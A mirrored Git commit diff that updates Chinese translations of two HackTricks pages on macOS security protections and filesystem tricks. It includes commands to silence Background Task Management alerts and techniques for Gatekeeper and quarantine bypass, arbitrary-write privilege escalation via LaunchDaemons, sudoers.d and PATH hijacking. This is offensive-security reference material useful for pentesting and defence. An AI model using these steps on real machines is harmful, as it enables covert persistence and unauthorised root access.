Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

Browse source
This commit is contained in:
Translator 2024-07-19 11:24:45 +00:00
parent 5e49464e79
commit 5a6b15c8da
100 changed files with 6660 additions and 6373 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

90
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
View file

@ -1,24 +1,25 @@
# macOS安全保护
# macOS 安全保护
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## Gatekeeper
Gatekeeper通常用于指代**Quarantine + Gatekeeper + XProtect**的组合这是3个macOS安全模块旨在**阻止用户执行可能是恶意软件的下载**
Gatekeeper 通常用于指代 **Quarantine + Gatekeeper + XProtect** 的组合,这三个 macOS 安全模块将尝试 **防止用户执行潜在恶意软件**
更多信息:
更多信息请参见
{% content-ref url="macos-gatekeeper.md" %}
[macos-gatekeeper.md](macos-gatekeeper.md)
@ -34,52 +35,52 @@ Gatekeeper通常用于指代**Quarantine + Gatekeeper + XProtect**的组合,
### 沙盒
macOS沙盒**限制在沙盒内运行的应用程序**执行沙盒配置文件中指定的**允许操作**。这有助于确保**应用程序只能访问预期的资源**
macOS 沙盒 **限制应用程序** 在沙盒内运行时的 **允许操作**,这些操作在应用程序运行时的沙盒配置文件中指定。这有助于确保 **应用程序仅访问预期的资源**
{% content-ref url="macos-sandbox/" %}
[macos-sandbox](macos-sandbox/)
{% endcontent-ref %}
### TCC - **透明、同意和控制**
### TCC - **透明、同意和控制**
**TCC透明度、同意和控制)**是一个安全框架。它旨在**管理应用程序的权限**,特别是通过规范它们对敏感功能的访问。这包括诸如**位置服务、联系人、照片、麦克风、摄像头、辅助功能和完全磁盘访问**等元素。TCC确保应用程序只能在获得明确用户同意后访问这些功能从而增强隐私和对个人数据的控制。
**TCC透明性、同意和控制)** 是一个安全框架。它旨在 **管理应用程序的权限**,特别是通过调节它们对敏感功能的访问。这包括 **位置服务、联系人、照片、麦克风、相机、无障碍和完全磁盘访问** 等元素。TCC 确保应用程序只能在获得用户明确同意后访问这些功能,从而增强对个人数据的隐私和控制。
{% content-ref url="macos-tcc/" %}
[macos-tcc](macos-tcc/)
{% endcontent-ref %}
### 启动/环境约束信任缓存
### 启动/环境约束信任缓存
macOS中的启动约束是一项安全功能,通过将系统二进制文件分类到**信任缓存**中的约束类别,来**规范进程启动**,定义**谁可以启动**进程,**如何启动**以及**从哪里启动**。在macOS Ventura中引入每个可执行二进制文件都有其**启动**的设定**规则**,包括**自身**、**父级**和**负责**约束。在macOS Sonoma中扩展到第三方应用程序作为**环境**约束,这些功能有助于通过管理进程启动条件来减轻潜在的系统利用。
macOS 中的启动约束是一种安全功能,用于 **调节进程启动**,通过定义 **谁可以启动** 进程、**如何** 启动以及 **从哪里** 启动。该功能在 macOS Ventura 中引入,将系统二进制文件分类到信任缓存中的约束类别。每个可执行二进制文件都有设定的 **启动规则**,包括 **自我**、**父级** 和 **责任** 约束。扩展到第三方应用程序作为 macOS Sonoma 中的 **环境** 约束,这些功能通过管理进程启动条件来帮助减轻潜在的系统利用。
{% content-ref url="macos-launch-environment-constraints.md" %}
[macos-launch-environment-constraints.md](macos-launch-environment-constraints.md)
{% endcontent-ref %}
## MRT - 恶意软件除工具
## MRT - 恶意软件除工具
恶意软件清除工具MRT是macOS安全基础设施的另一部分。顾名思义MRT的主要功能是**从受感染系统中删除已知的恶意软件**
恶意软件移除工具 (MRT) 是 macOS 安全基础设施的另一个组成部分。顾名思义MRT 的主要功能是 **从感染的系统中移除已知恶意软件**
一旦在Mac上检测到恶意软件无论是通过XProtect还是其他方式MRT可用于自动**清除恶意软件**。MRT在后台静默运行通常在系统更新时运行或者在下载新的恶意软件定义时运行看起来MRT用于检测恶意软件的规则存储在二进制文件中)。
一旦在 Mac 上检测到恶意软件(无论是通过 XProtect 还是其他方式),可以使用 MRT 自动 **移除恶意软件**。MRT 在后台静默运行,通常在系统更新或下载新恶意软件定义时运行(看起来 MRT 检测恶意软件的规则在二进制文件内部)。
虽然XProtect和MRT都是macOS安全措施的一部分但它们执行不同的功能
虽然 XProtect MRT 都是 macOS 安全措施的一部分,但它们执行不同的功能:
- **XProtect**是一种预防工具。它会在文件下载时(通过某些应用程序)**检查文件**,如果检测到任何已知类型的恶意软件,它会**阻止文件打开**,从而防止恶意软件首次感染系统。
- 另一方面,**MRT**是一种**响应式工具**。它在系统上检测到恶意软件后运行,目的是删除有问题的软件以清理系统。
* **XProtect** 是一种预防工具。它 **检查下载的文件**(通过某些应用程序),如果检测到任何已知类型的恶意软件,它 **阻止文件打开**,从而防止恶意软件首先感染您的系统。
* **MRT** 则是一个 **反应工具**。它在系统检测到恶意软件后运行,旨在移除有问题的软件以清理系统。
MRT应用程序位于**`/Library/Apple/System/Library/CoreServices/MRT.app`**
MRT 应用程序位于 **`/Library/Apple/System/Library/CoreServices/MRT.app`**
## 后台任务管理
**macOS**现在会**提醒**每当工具使用已知的**持久代码执行技术**(如登录项、守护程序等)时,以便用户更好地了解**哪些软件是持久的**
**macOS** 现在 **提醒** 每次工具使用众所周知的 **技术来保持代码执行**(如登录项、守护进程等),以便用户更好地了解 **哪些软件在持续运行**
<figure><img src="../../../.gitbook/assets/image (1183).png" alt=""><figcaption></figcaption></figure>
通过位于`/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/backgroundtaskmanagementd`的**守护程**和位于`/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Support/BackgroundTaskManagementAgent.app`的**代理**来运行的
这通过位于 `/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/backgroundtaskmanagementd` **守护程** 和位于 `/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Support/BackgroundTaskManagementAgent.app`**代理** 运行
**`backgroundtaskmanagementd`**知道某个东西安装在持久文件夹中的方式是通过**获取FSEvents**并为其创建一些**处理程序**
**`backgroundtaskmanagementd`** 知道某些东西安装在持久文件夹中的方式是通过 **获取 FSEvents** 并为这些事件创建一些 **处理程序**
此外,有一个包含由苹果维护的**众所周知的应用程序**的属性列表文件,位于:`/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/attributions.plist`
此外,还有一个 plist 文件,包含 **众所周知的应用程序**,这些应用程序经常保持,由苹果维护,位于:`/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/attributions.plist`
```json
[...]
"us.zoom.ZoomDaemon" => {
@ -95,33 +96,33 @@ MRT应用程序位于**`/Library/Apple/System/Library/CoreServices/MRT.app`**
}
[...]
```
### 枚举
### Enumeration
可以使用苹果的命令行工具**枚举所有**配置的后台项目:
可以使用 Apple cli 工具**枚举所有**配置的后台项目:
```bash
# The tool will always ask for the users password
sfltool dumpbtm
```
此外,还可以使用[**DumpBTM**](https://github.com/objective-see/DumpBTM)列出这些信息。
此外,还可以使用 [**DumpBTM**](https://github.com/objective-see/DumpBTM) 列出这些信息。
```bash
# You need to grant the Terminal Full Disk Access for this to work
chmod +x dumpBTM
xattr -rc dumpBTM # Remove quarantine attr
./dumpBTM
```
这些信息被存储在 **`/private/var/db/com.apple.backgroundtaskmanagement/BackgroundItems-v4.btm`** 中,终端需要 FDA。
此信息存储在 **`/private/var/db/com.apple.backgroundtaskmanagement/BackgroundItems-v4.btm`** 中,终端需要 FDA。
### 操纵 BTM
### 干扰 BTM
当发现新的持久性时,会触发一个类型为 **`ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD`** 的事件。因此,任何阻止发送此事件或使代理警告用户的方法都将帮助攻击者 _**绕过**_ BTM。
当发现新的持久性时,会发生类型为 **`ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD`** 的事件。因此,任何 **防止****事件** 被发送或 **代理不提醒** 用户的方法都将帮助攻击者 _**绕过**_ BTM。
* **重置数据库**:运行以下命令将重置数据库(应该从头开始重建),但出于某种原因,在运行此命令后,**直到系统重新启动之前,不会警告任何新的持久性**。
* **重置数据库**:运行以下命令将重置数据库(应该从头开始重建),但是,由于某种原因,运行此命令后,**在系统重启之前不会提醒任何新的持久性**。
* 需要 **root** 权限。
```bash
# Reset the database
sfltool resettbtm
```
* **停止代理程序**:可以向代理程序发送停止信号,这样当发现新的检测时,**就不会提醒用户**。
* **停止代理**:可以向代理发送停止信号,以便它**在发现新检测时不会提醒用户**。
```bash
# Get PID
pgrep BackgroundTaskManagementAgent
@ -134,10 +135,25 @@ kill -SIGSTOP 1011
ps -o state 1011
T
```
* **漏洞**: 如果**创建持久性的进程在其后立即存在**,守护进程将尝试**获取有关其的信息****失败**,并且**无法发送事件**指示新的持久性事物。
* **错误**:如果**创建持久性的进程在其后快速存在**,守护进程将尝试**获取信息****失败**,并且**无法发送事件**指示新的事物正在持久化
有关BTM的**更多信息**和**参考资料**
参考和**关于BTM的更多信息**
* [https://youtu.be/9hjUmT031tc?t=26481](https://youtu.be/9hjUmT031tc?t=26481)
* [https://www.patreon.com/posts/new-developer-77420730?l=fr](https://www.patreon.com/posts/new-developer-77420730?l=fr)
* [https://support.apple.com/en-gb/guide/deployment/depdca572563/web](https://support.apple.com/en-gb/guide/deployment/depdca572563/web)
{% hint style="success" %}
学习和实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持HackTricks</summary>
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR来分享黑客技巧。
</details>
{% endhint %}
</details>

146
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
View file

@ -1,54 +1,55 @@
# macOS FS 技巧
# macOS FS Tricks
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) 上**关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## POSIX 权限组合
**目录**中的权限:
* **读取** - 可以**枚举**目录条目
* **写入** - 可以**删除/写入**目录中的**文件**,并且可以**删除空文件夹**。
* 但是,除非您对其具有写入权限,否则**无法删除/修改非空文件夹**
* 除非您拥有它,否则**无法修改文件夹的名称**
* **执行** - 您被**允许遍历**目录 - 如果您没有此权限,您将无法访问其中的任何文件,或任何子目录中的文件。
* **读取** - 可以**枚举**目录条目
* **写入** - 可以**删除/写入**目录中的**文件**,并且可以**删除空文件夹**。
* 但你**不能删除/修改非空文件夹**,除非你对其拥有写入权限
* 你**不能修改文件夹的名称**,除非你拥有它
* **执行** - 你被**允许遍历**目录 - 如果你没有这个权限,你将无法访问其中的任何文件或任何子目录中的文件。
### 危险组合
**如何覆盖 root 拥有的文件/文件夹**,但:
**如何覆盖一个由 root 拥有的文件/文件夹**,但:
* 路径中的一个父**目录所有者**是用户
* 路径中的一个父**目录所有者**是具有**写入访问权限**的**用户组**
* 一个用户**组**对**文件**具有**写入**访问权限
* 路径中的一个父**目录所有者**是具有**写入权限**的**用户组**
* 一个用户**组**对**文件**具有**写入**权限
使用上述任何组合,攻击者可以**注入**一个**符号链接/硬链接**到预期路径,以获取特权任意写入。
在任何上述组合中,攻击者可以**注入**一个**符号/硬链接**到预期路径,以获得特权的任意写入。
### 文件夹根目录 R+X 特殊情况
### 文件夹 root R+X 特殊情况
如果**目录**中有**只有 root 具有 R+X 访问权限**的文件,那些文件对其他人**不可访问**。因此,如果存在一个漏洞允许**移动一个用户可读的文件**(由于该**限制**而无法读取),从该目录**到另一个目录**,则可能被滥用以读取这些文件。
如果在一个**目录**中,**只有 root 拥有 R+X 访问权限**,那么这些文件对**其他任何人都不可访问**。因此,允许将一个用户可读的**文件**从这个文件夹**移动到另一个文件夹**的漏洞,可能会被滥用以读取这些文件。
示例:[https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/#nix-directory-permissions](https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/#nix-directory-permissions)
示例[https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/#nix-directory-permissions](https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/#nix-directory-permissions)
## 符号链接 / 硬链接
如果一个特权进程正在写入**文件**,该文件可能被**低权限用户控制**,或者可能是由低权限用户**先前创建**的。用户只需通过符号链接或硬链接**将其指向另一个文件**,特权进程将写入该文件
如果一个特权进程正在写入一个**文件**,该文件可能被**低权限用户控制**,或者可能是**之前由低权限用户创建**的。用户可以通过符号链接或硬链接**指向另一个文件**,特权进程将会在该文件上写入
查看其他部分,攻击者可能**滥用任意写入以提升权限**。
查看其他部分,攻击者可能**滥用任意写入以提升权限**。
## .fileloc
具有**`.fileloc`**扩展名的文件可以指向其他应用程序或二进制文件,因此当打开它们时,执行该应用程序/二进制文件。\
具有**`.fileloc`** 扩展名的文件可以指向其他应用程序或二进制文件,因此当它们被打开时,执行的将是该应用程序/二进制文件。\
示例:
```xml
<?xml version="1.0" encoding="UTF-8"?>
@ -62,21 +63,21 @@
</dict>
</plist>
```
## 任意FD
## Arbitrary FD
如果你可以让一个**进程以高权限打开文件或文件夹**,你可以滥用**`crontab`**来打开`/etc/sudoers.d`中的文件,使用**`EDITOR=exploit.py`**,这样`exploit.py`将获得`/etc/sudoers`中文件的FD并滥用它
如果你能让一个 **进程以高权限打开一个文件或文件夹**,你可以利用 **`crontab`** 以 **`EDITOR=exploit.py`** 打开 `/etc/sudoers.d` 中的一个文件,这样 `exploit.py` 将获得对 `/etc/sudoers` 中文件的 FD 并加以利用
例如[https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098)
例如: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098)
## 避免隔离xattrs技巧
## Avoid quarantine xattrs tricks
### 删除它
### Remove it
```bash
xattr -d com.apple.quarantine /path/to/file_or_app
```
### uchg / uchange / uimmutable标志
### uchg / uchange / uimmutable flag
如果文件/文件夹具有此不可变属性则无法在其上放置xattr
如果一个文件/文件夹具有此不可变属性,则无法在其上放置 xattr
```bash
echo asd > /tmp/asd
chflags uchg /tmp/asd # "chflags uchange /tmp/asd" or "chflags uimmutable /tmp/asd"
@ -86,9 +87,9 @@ xattr: [Errno 1] Operation not permitted: '/tmp/asd'
ls -lO /tmp/asd
# check the "uchg" in the output
```
### defvfs挂载
### defvfs mount
**devfs**挂载**不支持xattr**,更多信息请参考[**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)
一个 **devfs** 挂载 **不支持 xattr**,更多信息请参见 [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)
```bash
mkdir /tmp/mnt
mount_devfs -o noowners none "/tmp/mnt"
@ -99,7 +100,7 @@ xattr: [Errno 1] Operation not permitted: '/tmp/mnt/lol'
```
### writeextattr ACL
此 ACL 阻止向文件添加 `xattrs`
此 ACL 防止向文件添加 `xattrs`
```bash
rm -rf /tmp/test*
echo test >/tmp/test
@ -122,13 +123,13 @@ ls -le /tmp/test
```
### **com.apple.acl.text xattr + AppleDouble**
**AppleDouble**文件格式复制文件及其ACEs
**AppleDouble** 文件格式复制一个文件及其 ACE。
在[**源代码**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html)中,可以看到存储在名为**`com.apple.acl.text`**的xattr中的ACL文本表示将被设置为解压后文件的ACL。因此如果您将一个应用程序压缩成一个使用**AppleDouble**文件格式的zip文件并且该文件格式具有防止其他xattr被写入的ACL... 那么隔离xattr 将不会被设置到该应用程序中:
[**源代码**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) 中可以看到,存储在名为 **`com.apple.acl.text`** 的 xattr 中的 ACL 文本表示将被设置为解压缩文件中的 ACL。因此如果你将一个应用程序压缩成一个带有 ACL 的 **AppleDouble** 文件格式的 zip 文件,该 ACL 阻止其他 xattrs 被写入... 那么隔离 xattr 并没有被设置到应用程序中:
查看[**原始报告**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/)以获取更多信息。
查看 [**原始报告**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) 获取更多信息。
要复制这一过程首先需要获取正确的acl字符串:
要复制这个,我们首先需要获取正确的 acl 字符串:
```bash
# Everything will be happening here
mkdir /tmp/temp_xattrs
@ -148,7 +149,7 @@ ls -le test
```
(Note that even if this works the sandbox write the quarantine xattr before)
不是真的需要,但我还是留着以防万一:
不是真的需要,但我留着以防万一:
{% content-ref url="macos-xattr-acls-extra-stuff.md" %}
[macos-xattr-acls-extra-stuff.md](macos-xattr-acls-extra-stuff.md)
@ -156,9 +157,9 @@ ls -le test
## 绕过代码签名
Bundle 包含文件 **`_CodeSignature/CodeResources`**,其中包含 **bundle** 中每个 **文件****哈希值**。请注意CodeResources 的哈希值也被**嵌入在可执行文件中**,因此我们无法对其进行更改。
Bundles 包含文件 **`_CodeSignature/CodeResources`**,其中包含每个 **file****bundle** 中的 **hash**。请注意CodeResources 的 hash 也 **嵌入在可执行文件中**,因此我们也不能对其进行修改。
然而,有一些文件的签名不会被检查,这些文件在属性列表中具有省略键,如:
然而,有一些文件的签名不会被检查,这些文件在 plist 中具有 omit 键,例如:
```xml
<dict>
...
@ -202,15 +203,19 @@ Bundle 包含文件 **`_CodeSignature/CodeResources`**,其中包含 **bundle**
...
</dict>
```
可以使用以下命令行计算资源的签名:
可以通过命令行计算资源的签名:
{% code overflow="wrap" %}
```bash
openssl dgst -binary -sha1 /System/Cryptexes/App/System/Applications/Safari.app/Contents/Resources/AppIcon.icns | openssl base64
```
## 挂载dmgs
{% endcode %}
用户可以挂载一个自定义的dmg甚至可以覆盖一些现有文件夹。以下是如何创建一个带有自定义内容的自定义dmg包的方法
## 挂载 dmgs
用户可以挂载一个自定义的 dmg即使是在某些现有文件夹上。这就是您如何创建一个包含自定义内容的自定义 dmg 包:
{% code overflow="wrap" %}
```bash
# Create the volume
hdiutil create /private/tmp/tmp.dmg -size 2m -ov -volname CustomVolName -fs APFS 1>/dev/null
@ -233,20 +238,20 @@ hdiutil create -srcfolder justsome.app justsome.dmg
```
{% endcode %}
通常 macOS 会通过与 `com.apple.DiskArbitrarion.diskarbitrariond` Mach 服务通信(由 `/usr/libexec/diskarbitrationd` 提供)来挂载磁盘。如果在 LaunchDaemons plist 文件中添加参数 `-d` 并重新启动,它将会将日志存储在 `/var/log/diskarbitrationd.log` 中。\
然而,可以使用诸如 `hdik``hdiutil` 这样的工具直接与 `com.apple.driver.DiskImages` kext 通信。
通常macOS通过与`com.apple.DiskArbitrarion.diskarbitrariond` Mach服务由`/usr/libexec/diskarbitrationd`提供进行通信来挂载磁盘。如果在LaunchDaemons plist文件中添加参数`-d`并重启,它将把日志存储在`/var/log/diskarbitrationd.log`中。\
然而,可以使用像`hdik`和`hdiutil`这样的工具直接与`com.apple.driver.DiskImages` kext进行通信。
## 任意写入
### 定期 sh 脚本
### 定期sh脚本
如果您的脚本可以被解释为 **shell 脚本**,则可以覆盖 **`/etc/periodic/daily/999.local`** shell 脚本,该脚本将每天触发一次
如果您的脚本可以被解释为**shell脚本**,您可以覆盖**`/etc/periodic/daily/999.local`** shell脚本该脚本将每天触发
您可以使用以下命令**伪造**执行此脚本:**`sudo periodic daily`**
您可以用以下命令**伪造**此脚本的执行**`sudo periodic daily`**
### 守护程
### 守护
编写一个任意的 **LaunchDaemon**,如 **`/Library/LaunchDaemons/xyz.hacktricks.privesc.plist`**,其中包含执行任意脚本的 plist如下所示
编写一个任意的**LaunchDaemon**,如**`/Library/LaunchDaemons/xyz.hacktricks.privesc.plist`**其中plist执行一个任意脚本
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@ -263,19 +268,21 @@ hdiutil create -srcfolder justsome.app justsome.dmg
</dict>
</plist>
```
Just generate the script `/Applications/Scripts/privesc.sh` with the **commands** you would like to run as root.
### Sudoers File
如果你有**任意写入权限**,你可以创建一个文件在文件夹**`/etc/sudoers.d/`**里,授予自己**sudo**权限。
如果你有 **任意写入** 权限,你可以在 **`/etc/sudoers.d/`** 文件夹内创建一个文件,授予自己 **sudo** 权限。
### PATH files
文件**`/etc/paths`** 是一个主要用来设置PATH环境变量的地方。你必须是root才能覆盖它但如果一个来自**特权进程**的脚本在执行一些**没有完整路径的命令**,你也许可以通过修改这个文件来**劫持**它。
文件 **`/etc/paths`** 是填充 PATH 环境变量的主要位置之一。你必须是 root 才能覆盖它,但如果 **特权进程** 执行某些 **没有完整路径****命令**,你可能能够通过修改此文件来 **劫持** 它。
也可以在**`/etc/paths.d`**里写入文件来加载新的文件夹到`PATH`环境变量中。
还可以在 **`/etc/paths.d`** 中写入文件,以将新文件夹加载到 `PATH` 环境变量中。
## 生成其他用户可写文件
## 生成其他用户可写文件
这将生成一个属于root但我可以写入的文件[**代码在这里**](https://github.com/gergelykalman/brew-lpe-via-periodic/blob/main/brew\_lpe.sh))。这也可能作为权限提升
这将生成一个属于 root 的文件,我可以写入([**代码来自这里**](https://github.com/gergelykalman/brew-lpe-via-periodic/blob/main/brew\_lpe.sh))。这也可能作为提权工作
```bash
DIRNAME=/usr/local/etc/periodic/daily
@ -289,7 +296,7 @@ echo $FILENAME
```
## POSIX 共享内存
**POSIX 共享内存** 允许 POSIX 兼容操作系统中的进程访问一个共享内存区域,相比其他进程间通信方法,可以实现更快的通信。它涉及使用 `shm_open()` 创建或打开一个共享内存对象,使用 `ftruncate()` 设置其大小,并使用 `mmap()` 将其映射到进程的地址空间。进程可以直接从这个内存区域读取和写入数据。为了管理并发访问并防止数据损坏,通常使用诸如互斥锁或信号量等同步机制。最后,进程使用 `munmap()``close()` 取消映射和关闭共享内存,并可选择使用 `shm_unlink()` 删除内存对象。在需要多个进程快速访问共享数据的环境中,这种系统特别适用于高效快速的进程间通信
**POSIX 共享内存** 允许在符合 POSIX 的操作系统中的进程访问一个公共内存区域,与其他进程间通信方法相比,促进了更快的通信。它涉及使用 `shm_open()` 创建或打开一个共享内存对象,使用 `ftruncate()` 设置其大小,并使用 `mmap()` 将其映射到进程的地址空间。进程可以直接从这个内存区域读取和写入。为了管理并发访问并防止数据损坏,通常使用互斥锁或信号量等同步机制。最后,进程使用 `munmap()``close()` 解除映射并关闭共享内存,并可选择使用 `shm_unlink()` 删除内存对象。该系统在多个进程需要快速访问共享数据的环境中,尤其有效于高效、快速的 IPC
<details>
@ -385,28 +392,29 @@ return 0;
## macOS 受保护描述符
**macOS 受保护描述符**是 macOS 中引入的一项安全功能,旨在增强用户应用程序中的**文件描述符操作**的安全性和可靠性。这些受保护描述符提供了一种将特定限制或“保护”与文件描述符关联起来的方式,这些限制由内核强制执行。
**macOS 受保护描述符** macOS 中引入的一项安全功能,旨在增强用户应用程序中 **文件描述符操作** 的安全性和可靠性。这些受保护的描述符提供了一种将特定限制或“保护”与文件描述符关联的方法,这些限制由内核强制执行。
该功能特别有助于防止某些类别的安全漏洞,如**未经授权的文件访问**或**竞争条件**。这些漏洞会在例如一个线程正在访问一个文件描述符时,给**另一个易受攻击的线程访问权限**,或者当一个文件描述符被**易受攻击的子进程继承**时发生。与此功能相关的一些函数包括:
此功能特别有助于防止某些类别的安全漏洞,例如 **未经授权的文件访问****竞争条件**。这些漏洞发生在例如一个线程正在访问一个文件描述符,导致 **另一个易受攻击的线程对其的访问**,或者当一个文件描述符被 **继承** 给一个易受攻击的子进程时。与此功能相关的一些函数包括:
* `guarded_open_np`: 使用保护打开一个文件描述符
* `guarded_open_np`: 以保护方式打开文件描述符
* `guarded_close_np`: 关闭它
* `change_fdguard_np`: 更改描述符上的保护标志(甚至移除保护)
## 参考资料
## 参考文献
* [https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/](https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
